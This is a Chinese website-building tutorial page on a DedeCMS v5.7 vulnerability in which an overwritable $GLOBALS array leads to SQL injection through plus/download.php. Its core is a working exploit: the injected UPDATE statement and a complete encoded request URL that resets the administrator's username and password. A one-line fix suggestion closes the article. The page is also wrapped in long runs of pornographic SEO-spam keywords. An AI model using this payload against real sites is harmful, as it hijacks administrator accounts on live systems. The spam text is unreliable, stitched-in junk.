婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網站建設 > 建站知識 > dedecms修改任意管理員漏洞處理方法

dedecms修改任意管理員漏洞處理方法

POST TIME:2021-05-19 22:58

本文實例講述了dedecms修改任意管理員漏洞處理方法。分享給大家供大家參考。具體分析如下:

織夢DEDECMS是全國用到最多的cms系統了,正由于用得人多而且是開源的代碼,所以分析人也多bug出現不少,根據小編總結出現bug大多是在變量上,這次又是全局變量$GLOBALS可以被任意修改導致的,下面來給各位演示這個bug與處理方法.

漏洞版本:dedecms v5.7

漏洞描述:起因是全局變量$GLOBALS可以被任意修改,以下舉一例,代碼如下:

代碼如下:// include/dedesql.class.php
if(isset($GLOBALS['arrs1']))
{
$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
$v2 .= chr($arrs2[$i]); //解碼ascii
}
$GLOBALS[$v1] .= $v2; www.bitsCN.com//注意這里不是覆蓋,是+
}

function SetQuery($sql)
{
$prefix="dede_";
$sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);
$this->queryString = $sql;
}
下面說下繞過80sec防注入的方法.

同一文件中,有兩個執行SQL的函數,ExecuteNoneQuery和ExecuteNoneQuery2

而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件,代碼如下:

代碼如下:// plus/download.php
else if($open==1)
{
$id = isset($id) && is_numeric($id) ? $id : 0;
$link = base64_decode(urldecode($link));
$hash = md5($link);
//這里的#@_是可以控制的
$rs = $dsql->ExecuteNoneQuery2("UPDATE `dede_downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");
if($rs <= 0) { $query = " INSERT INTO `dede_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query);
}
header("location:$link");
exit();
}
構造SQL語句(提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc),代碼如下:

代碼如下:admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #

完整SQL語句,代碼如下:

代碼如下:UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
測試方法,代碼如下:

代碼如下:// 本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出問題,后臺登錄用戶spider密碼admin

安全建議:將應用到ExecuteNoneQuery2函數的文件均改為使用ExecuteNoneQuery函數并且根據情況,調試程序盡可能不要爆出絕對路徑地址.

希望本文所述對大家的dedecms建站有所幫助。




收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
99re66热这里只有精品3直播| 91影视在线播放| 国产一区二区三区最好精华液| 日本丶国产丶欧美色综合| 久久久午夜精品理论片中文字幕| 视频一区视频二区在线观看| 在线观看成人小视频| 亚洲免费色视频| 97精品视频在线观看自产线路二 | 国产剧情一区在线| 精品国产电影一区二区| 精品无人区卡一卡二卡三乱码免费卡| 日韩一级欧美一级| 欧美精选午夜久久久乱码6080| 欧美日韩亚洲国产综合| 亚洲一区二区视频| 日韩一二三四区| 国产乱色国产精品免费视频| 久久久综合视频| 风间由美性色一区二区三区| 中文字幕一区二区日韩精品绯色| hitomi一区二区三区精品| 伊人婷婷欧美激情| 欧美大度的电影原声| www.一区二区| 午夜影院在线观看欧美| 久久久91精品国产一区二区三区| 成人性生交大片免费看视频在线 | 国产一区二区久久| 中文字幕日韩一区| 欧美丰满少妇xxxxx高潮对白 | 亚洲一区二区三区中文字幕在线 | 久久九九久久九九| 在线观看欧美日本| 国产曰批免费观看久久久| 亚洲另类在线视频| 久久久激情视频| 欧美日韩精品一区二区| 国产v综合v亚洲欧| 日本不卡不码高清免费观看| 中文字幕在线不卡一区| 久久久久99精品国产片| 欧美视频一区二区三区| 成人午夜视频免费看| 日韩精品欧美成人高清一区二区| 国产精品美女久久久久久久网站| 欧美精品一二三区| 日本韩国精品一区二区在线观看| 韩国欧美国产1区| 日韩高清在线一区| 亚洲午夜影视影院在线观看| 国产精品沙发午睡系列990531| 在线综合+亚洲+欧美中文字幕| voyeur盗摄精品| 成人免费观看视频| 国产精品一二二区| 国模一区二区三区白浆| 久久狠狠亚洲综合| 亚洲成人免费电影| 性感美女久久精品| 婷婷久久综合九色国产成人| 一区二区三区高清不卡| 亚洲一区二区三区视频在线播放| 国产精品美女一区二区在线观看| 久久精品综合网| 亚洲大片精品永久免费| www.99精品| jiyouzz国产精品久久| 国产成人aaaa| 国产98色在线|日韩| 国产乱码精品1区2区3区| 寂寞少妇一区二区三区| 久久se这里有精品| 国产在线播放一区| 国产丶欧美丶日本不卡视频| 国产乱对白刺激视频不卡| 国产一区二区女| 成人丝袜18视频在线观看| 成人午夜大片免费观看| 菠萝蜜视频在线观看一区| 99精品国产91久久久久久| 91精品办公室少妇高潮对白| 欧美午夜视频网站| 日韩一区二区三免费高清| 精品国产伦一区二区三区免费 | 国产亚洲精久久久久久| 中文子幕无线码一区tr| 亚洲精品乱码久久久久久黑人 | 中文字幕免费在线观看视频一区| 国产片一区二区三区| 亚洲三级电影全部在线观看高清| 亚洲伦在线观看| 日韩精品1区2区3区| 激情五月婷婷综合| 91免费版在线看| 日韩欧美中文字幕一区| 国产欧美日韩中文久久| 亚洲精品久久久久久国产精华液| 丝袜a∨在线一区二区三区不卡| 卡一卡二国产精品| 99久久伊人网影院| 91精品国产色综合久久久蜜香臀| 国产校园另类小说区| 亚洲色图制服诱惑| 国产综合色视频| 91黄色激情网站| 久久精品视频一区二区三区| 国产成人精品免费网站| 日韩理论电影院| 蜜臀久久久久久久| 91在线免费播放| 日韩你懂的在线播放| 中文字幕一区二区三区在线播放 | 久久久精品2019中文字幕之3| 综合电影一区二区三区| 久久国产精品露脸对白| 在线日韩av片| 国产精品久久久久久久久晋中| 三级影片在线观看欧美日韩一区二区| 成人天堂资源www在线| 日韩视频免费直播| 亚洲午夜久久久久久久久久久 | 免费在线视频一区| 一本久久综合亚洲鲁鲁五月天| 日韩一区二区三区免费观看| 亚洲综合激情网| 97aⅴ精品视频一二三区| 精品免费国产一区二区三区四区| 一级特黄大欧美久久久| av亚洲精华国产精华精华| 久久久高清一区二区三区| 日本va欧美va欧美va精品| 91亚洲精品一区二区乱码| 国产日韩欧美在线一区| 国产一区二三区好的| 精品国产区一区| 激情综合色播激情啊| 日韩精品一区国产麻豆| 偷拍一区二区三区四区| 欧美午夜视频网站| 亚洲综合视频在线观看| 色综合久久久久综合体桃花网| 国产精品理论在线观看| 国产成人在线视频播放| 亚洲精品在线一区二区| 美女www一区二区| 欧美日韩在线观看一区二区| 伊人一区二区三区| 欧美午夜视频网站| 日韩福利电影在线观看| 日韩欧美色电影| 国产精品一卡二卡在线观看| 26uuu国产电影一区二区| 国产精品一区二区久久精品爱涩| 久久久久久久性| 国产成人精品亚洲日本在线桃色| 国产精品系列在线| 91麻豆6部合集magnet| 一区二区三区四区亚洲| 日本高清视频一区二区| 午夜精品久久久久久久久久| 91精品国产综合久久香蕉的特点| 另类小说一区二区三区| 欧美mv日韩mv国产网站| 成人av集中营| 亚洲国产综合视频在线观看| 欧美人xxxx| 精品一区二区三区免费播放| 欧美国产精品专区| 欧美在线小视频| 久久国内精品自在自线400部| 国产日韩精品一区二区三区| 色婷婷精品久久二区二区蜜臀av | 亚洲最大色网站| 91精品国产aⅴ一区二区| 国产一区二区免费视频| 亚洲男人的天堂在线aⅴ视频| 欧美电影一区二区| 成人v精品蜜桃久久一区| 亚洲自拍偷拍麻豆| 久久久久99精品一区| 欧美三日本三级三级在线播放| 国产在线精品一区二区三区不卡| 亚洲欧洲日产国码二区| 欧美色综合久久| 日韩激情中文字幕| 中文字幕不卡一区| 91精品国产一区二区三区香蕉| 国产精品综合一区二区三区| 亚洲国产视频直播| 国产精品久久777777| 欧美α欧美αv大片| 欧洲一区二区av| 成人av电影在线观看| 麻豆免费精品视频| 亚洲国产中文字幕在线视频综合| 久久久99精品久久| 精品久久久久久久一区二区蜜臀| 欧美日韩一区不卡| 在线欧美小视频|